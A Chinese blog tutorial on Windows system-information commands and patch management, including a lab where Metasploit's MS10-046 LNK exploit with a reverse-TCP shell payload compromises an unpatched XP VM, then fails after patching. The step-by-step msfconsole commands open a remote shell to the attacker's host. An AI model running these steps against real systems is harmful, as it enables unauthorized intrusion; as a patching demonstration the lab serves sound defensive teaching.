2019/6/11 ----

此文章关于介绍Windows系统信息和补丁管理,针对补丁管理有一个小实验,来说明补丁管理的重要性。

系统信息

了解当前系统的信息
(1)版本
Windows NT是一系列操作系统的总称
命令:
1)ver

2) winver

  1. systeminfo (显示的更加详细)

2、查看sp
service packet (sp) 服务补丁包(一系列补丁的集合)
wmic os get servicepackmajorversion

3、查看hotfix----热补丁
针对单一漏洞的补丁
wmic qfe get hotfixid,installedon

4、查看主机名----hostname

5、查看网络配置-----ipconfig /all

6、查看路由表-----route print

7、查看开放端口----netstat -ano


扩展:

1、netstat -ano | find “:443” 查看开放端口443端口号对应的进程

2、tasklist -V | find “6988” 查找pid号8112的进程,-v 显示的更详细


3、taskkill /PID 6988 /T /F 强行终止一个进程

错误:权限无法访问
解决方法:右击cmd,用管理员身份运行


补丁管理

关于补丁管理的小实验

实验环境:
用VMware 模拟真实环境
一台kail linux 和windows xp 系统的主机
实验原理:
在kali linux上使用msfconsole利用ms10-046 漏洞对没有系统更新或打补丁的xp主机,进行攻击。
然后在xp主机上打上针对这种漏洞攻击的补丁,再进行攻击

文件快捷方式漏洞MS10-046,利用Windows快捷方式LNK文件的漏洞自动执行代码漏洞攻击。

实验准备:
kali linux 与 Windows xp 能互相ping通,
Windows xp 可以上外网。


实验工具:
这里准备了针对这个漏洞的补丁,和扫描漏洞的工具 MBSA

Microsoft 基准安全分析器 (MBSA) 可以检查操作系统和 SQL Server 更新,
还可以扫描计算机上的不安全配置。

链接:https://pan.baidu.com/s/1wrx65I_HrTkRv1-1PXjnCw
提取码:rzcp

MBSA工具的使用

双击安装软件,然后点击next

选择 I accept the license agreement,点击next

点击next

点击install

点击OK,点击桌面的应用程序

点击scan a computer

点击start scan

等待结束

继续等待

然后就可以看到有哪些策略不符合安全设置

实验开始:
一、kali linux 上用msfconsole攻击xp 主机

1、msfconsole     ---调用攻击工具
2、search ms10-046       ---扫描这个漏洞是否存在
3、use exploit/windows/browser/ms10_046_shortcut_icon_dllloader  ---使用这个漏洞
4、set payload windows/shell/reverse_tcp     ---设置反向链接
5、show options          ---查看选项
6、set srvhost 192.168.136.10            ---设置攻击者的ip地址(kali 的IP地址 )
7、set lhost 192.168.136.10          ---设置反向链接的IP地址(kali 的ip地址)
8、show options          ---查看选项
9、exploit           ---发动攻击


二、在xp上模拟中招,输入url地址:http://192.168.136.10:80/

三、查看会话,夺取shell,输入ipconfig,查看ip,攻击成功。。
1、sessions -i
2、sessions -i 1
3、ipconfig


四、安装补丁

五、再次攻击,发现攻击无效。。补丁的作用体现了出来(⊙_⊙)

OK,有什么问题,欢迎评论交流 ?

Windows安全加固系列-----系统信息与补丁管理相关推荐

  1. Windows安全加固系列-----口令策略

    2019/6/13 - 此文章是关于Windows安全加固中增强口令的复杂度及锁定策略,还有一个关于暴力破解的实验. 脆弱的口令 少于8个字符 单一的字符类型.例如只用小写字母.或只用数字 用户名与口 ...

  2. Windows安全加固系列

    阿里云Windows操作系统安全加固 :https://help.aliyun.com/knowledge_detail/49781.html 账号口令-SID详述 账号口令 优化账号 加固方法 图形 ...

  3. 强化管理远程分支机构利器之coreRODC[为企业部署Windows Server 2008系列九]

    core模式下部署DC在 <core模式下部署域控制器[为企业部署Windows Server 2008系列六]> 一文中已经和大家分享过了,如果现在你已经选择了2008域环境作为IT资源 ...

  4. Windows 自动化补丁管理

    Windows 自动化补丁管理 Desktop Central,这一倍受欢迎的补丁管理软件旨在修补可能导致安全薄弱.破坏关键系统数据或导致系统不可用的漏洞.管理此类软件漏洞对网络管理员来说简直是噩梦. ...

  5. 企业补丁管理-windows/Mac/Linux打补丁

    一旦确定并评估了网络中的漏洞,下一步便是将其关闭.供应商经常发布补丁来解决其产品中的漏洞.补丁程序管理应精心计划和精心安排.如果不是这样,它将造成比其应解决的漏洞更大的危害.Vulnerability ...

  6. 歌唱online活动目录数据库还原[为企业维护windows server 2008系列二]

    我宁愿你冷库到底-让我死心塌地忘记-我宁愿-(半夜三更,灯火通明的机房里,一个正在做活动目录数据库还原的新人歇斯底里-) only you~ 能帮我-哦 only you~-(又回想起老板对自己的重托 ...

  7. windows server 2008 系列讲座三部曲--在线讲座预告

    这里预告的事webcast方式的在线讲座,以演示为主,强调动手,希望能为广大IT同仁提供便捷的帮助. windows server 2008 系列讲座三部曲帮助您直达windows server 20 ...

  8. 一步步开始集中管理[为企业部署Windows Server 2008系列五] 推荐

    我们通过前面四篇部署windows server 2008 的文章了解到部署的过程和方法: "卍解[为企业部署Windows Server 2008系列一]  " " 完 ...

  9. Windows Mobile 开发系列文章收藏 - Windows Mobile 6.x

    收集整理一些Windows Mobile 6.x开发相关文章, 文章及相关代码大部分搜集自网络,版权属于原作者! 智能手机      手机词汇      研发手机基本流程 WAP协议分析(1)     ...

最新文章

  1. 蝙蝠未能连接到服务器是什么原因,家里飞来一只蝙蝠,怎么办?早点知道,有备无患!...
  2. 贝特朗奇论 用计算机,关于贝特朗奇论的一点思考
  3. 深度学习图像融合_基于深度学习的图像超分辨率最新进展与趋势【附PDF】
  4. Traffic Manager Overview
  5. python的类方法、静态方法、实例方法_Python 类方法、实例方法、静态方法
  6. 单片机pic的linux环境代替,pic单片机can总线协议收发编程
  7. PC常见故障及解决思路汇总(系统方面)
  8. hive Unexpected column vector type LIST
  9. 《Spring实战》读书笔记-第5章 构建Spring Web应用程序
  10. CCF 202206-4 光线追踪 python
  11. 生兔子问题(递归算法)
  12. win10禁用全角,教你恢复win10系统屏蔽全角/半角快捷键的办法
  13. IC设计数字后端——ICC相关(2020)
  14. Photoshop2021 出现不可恢复的问题,即将退出
  15. 算法设计与分析-----动态规划
  16. 《Total Commander:万能文件管理器》——第2.2节.快速了解一款软件的4条途径
  17. VMware虚拟机下载与安装
  18. Python-Django-Ajax分页功能实现
  19. 工信部人才交流中心信创培训班结课!
  20. git bash命令

热门文章

  1. MATLAB--数字图像处理 绘画出图像灰度值的三维图像
  2. 专用SPWM芯片EG8030在三相逆变中的使用
  3. 问号表达式与逗号表达式问题
  4. 八皇后问题各种解法分析
  5. 基于QingDao Online Judge开发在线编程教育网
  6. CEO、CTO、CFO、COO公司架构
  7. 【Flutter】自定义折叠组件
  8. JVM之关于GC的扩展知识
  9. 时钟(分针和时针的重合问题)
  10. 【烟台大学】寒暑假登录YTU——手机版+电脑版